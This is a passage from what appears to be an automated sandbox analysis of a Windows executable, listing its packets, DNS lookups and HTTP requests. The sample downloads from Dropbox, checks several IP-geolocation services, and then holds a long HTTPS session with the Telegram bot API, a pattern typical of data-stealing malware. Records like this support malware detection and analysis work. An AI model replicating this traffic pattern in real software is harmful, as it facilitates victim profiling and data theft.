Jul 7, 2024 07:06:02.838390112 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:02.838435888 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:02.838562965 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:02.838809967 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:02.838824034 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:02.860984087 CEST	49740	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:02.861022949 CEST	443	49740	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.861079931 CEST	49740	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:02.861283064 CEST	49740	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:02.861294031 CEST	443	49740	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:03.319477081 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.319549084 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:03.321675062 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:03.321685076 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.321938992 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.323323965 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:03.368505001 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.465828896 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.465871096 CEST	443	49739	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:03.465925932 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:03.466545105 CEST	49739	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:03.469666004 CEST	49740	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:03.475507975 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:03.480294943 CEST	80	49741	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:03.480365038 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:03.480457067 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:03.484927893 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:03.484954119 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:03.485008001 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:03.485172987 CEST	80	49741	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:03.485280037 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:03.485292912 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:03.516499043 CEST	443	49740	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:03.531502008 CEST	443	49740	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:03.531569958 CEST	49740	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:03.953675985 CEST	80	49741	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:04.001671076 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:04.119668007 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.120117903 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.120134115 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.120311975 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.121459961 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.121464968 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.121665955 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.124419928 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.164499998 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.684789896 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.684853077 CEST	443	49742	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.685188055 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.685350895 CEST	49742	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.696795940 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:04.700242043 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.700282097 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.700545073 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.700668097 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:04.700680017 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:04.702151060 CEST	80	49741	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:04.702266932 CEST	49741	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:05.344125032 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:05.345869064 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.345894098 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:05.890177011 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:05.890239954 CEST	443	49743	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:05.890568972 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.891006947 CEST	49743	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.930082083 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.930121899 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:05.930325031 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.930473089 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:05.930485010 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:06.581536055 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:06.587050915 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:06.587069035 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:07.236156940 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:07.236215115 CEST	443	49744	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:07.236299992 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:07.236788988 CEST	49744	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:07.245676994 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:07.251301050 CEST	80	49745	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:07.251382113 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:07.251470089 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:07.257617950 CEST	80	49745	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:07.713977098 CEST	80	49745	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:07.731709957 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:07.731761932 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:07.731827021 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:07.732074976 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:07.732088089 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:07.767282963 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.201246977 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:08.203182936 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:08.203223944 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:08.339066029 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:08.339126110 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:08.339423895 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:08.339839935 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:08.339848995 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.340656042 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.344969988 CEST	80	49745	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:08.345067024 CEST	49745	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.345503092 CEST	80	49747	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:08.345652103 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.345735073 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:08.350518942 CEST	80	49747	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:08.884515047 CEST	80	49747	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:08.939173937 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.143702984 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.144932985 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.149375916 CEST	80	49747	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:09.149458885 CEST	49747	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.149750948 CEST	80	49748	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:09.149827003 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.149930000 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:09.154634953 CEST	80	49748	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:09.609289885 CEST	80	49748	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:09.610917091 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:09.610960960 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:09.611092091 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:09.611388922 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:09.611399889 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:09.657927036 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:10.094652891 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:10.096385002 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:10.096399069 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:10.234172106 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:10.234226942 CEST	443	49749	104.26.12.205	192.168.2.4
Jul 7, 2024 07:06:10.234541893 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:10.236092091 CEST	49749	443	192.168.2.4	104.26.12.205
Jul 7, 2024 07:06:10.259715080 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:10.267338991 CEST	80	49748	208.95.112.1	192.168.2.4
Jul 7, 2024 07:06:10.267503977 CEST	49748	80	192.168.2.4	208.95.112.1
Jul 7, 2024 07:06:10.276771069 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.276829004 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:10.276928902 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.279098034 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.279114962 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:10.913253069 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:10.913341999 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.915657043 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.915668964 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:10.915992022 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:10.917320013 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:10.917386055 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.215858936 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.216578960 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.216643095 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.216857910 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.216902018 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217166901 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217219114 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217319012 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217344999 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217363119 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217371941 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217386961 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217391014 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217421055 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217432976 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217514038 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217525005 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217545033 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217554092 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217572927 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217586994 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217592001 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217602015 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217756033 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217771053 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217782021 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217787981 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217803955 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217809916 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217838049 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217861891 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217926979 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217936039 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217957020 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217967987 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.217983007 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.217991114 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218040943 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218050003 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218060970 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218066931 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218086004 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218092918 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218125105 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218132973 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218153000 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218159914 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.218199015 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218271971 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218291998 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218307972 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218343973 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218400002 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218446970 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218512058 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.218532085 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227422953 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.227644920 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227659941 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.227685928 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227709055 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227722883 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227735996 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227777004 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227796078 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227864027 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227881908 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227901936 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.227911949 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.233149052 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.233289957 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.233299971 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.233303070 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.233325958 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.233340025 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:11.233349085 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:11.280498981 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:12.015039921 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:12.015178919 CEST	443	49750	149.154.167.220	192.168.2.4
Jul 7, 2024 07:06:12.015388966 CEST	49750	443	192.168.2.4	149.154.167.220
Jul 7, 2024 07:06:12.015801907 CEST	49750	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 7, 2024 07:05:57.019689083 CEST	58583	53	192.168.2.4	1.1.1.1
Jul 7, 2024 07:05:57.019978046 CEST	49944	53	192.168.2.4	1.1.1.1
Jul 7, 2024 07:05:57.027281046 CEST	53	49944	1.1.1.1	192.168.2.4
Jul 7, 2024 07:05:57.047833920 CEST	53	58583	1.1.1.1	192.168.2.4
Jul 7, 2024 07:06:02.830673933 CEST	57910	53	192.168.2.4	1.1.1.1
Jul 7, 2024 07:06:02.837721109 CEST	53	57910	1.1.1.1	192.168.2.4
Jul 7, 2024 07:06:03.467696905 CEST	65489	53	192.168.2.4	1.1.1.1
Jul 7, 2024 07:06:03.474989891 CEST	53	65489	1.1.1.1	192.168.2.4
Jul 7, 2024 07:06:10.259720087 CEST	60005	53	192.168.2.4	1.1.1.1
Jul 7, 2024 07:06:10.269753933 CEST	53	60005	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 7, 2024 07:05:57.019689083 CEST	192.168.2.4	1.1.1.1	0xd8bc	Standard query (0)	dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:05:57.019978046 CEST	192.168.2.4	1.1.1.1	0x1300	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:02.830673933 CEST	192.168.2.4	1.1.1.1	0xfd04	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:03.467696905 CEST	192.168.2.4	1.1.1.1	0xfbbe	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:10.259720087 CEST	192.168.2.4	1.1.1.1	0x52ff	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 7, 2024 07:05:57.027281046 CEST	1.1.1.1	192.168.2.4	0x1300	No error (0)	freegeoip.app		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:05:57.027281046 CEST	1.1.1.1	192.168.2.4	0x1300	No error (0)	freegeoip.app		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:05:57.047833920 CEST	1.1.1.1	192.168.2.4	0xd8bc	No error (0)	dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 7, 2024 07:05:57.047833920 CEST	1.1.1.1	192.168.2.4	0xd8bc	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.66.15	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:02.837721109 CEST	1.1.1.1	192.168.2.4	0xfd04	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:02.837721109 CEST	1.1.1.1	192.168.2.4	0xfd04	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:02.837721109 CEST	1.1.1.1	192.168.2.4	0xfd04	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:03.474989891 CEST	1.1.1.1	192.168.2.4	0xfbbe	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jul 7, 2024 07:06:10.269753933 CEST	1.1.1.1	192.168.2.4	0x52ff	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

freegeoip.app

dl.dropboxusercontent.com

api.ipify.org

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	208.95.112.1	80	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
Jul 7, 2024 07:06:03.480457067 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 7, 2024 07:06:03.953675985 CEST	641	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:02 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49745	208.95.112.1	80	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
Jul 7, 2024 07:06:07.251470089 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 7, 2024 07:06:07.713977098 CEST	641	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:06 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 56 X-Rl: 43 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	208.95.112.1	80	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
Jul 7, 2024 07:06:08.345735073 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
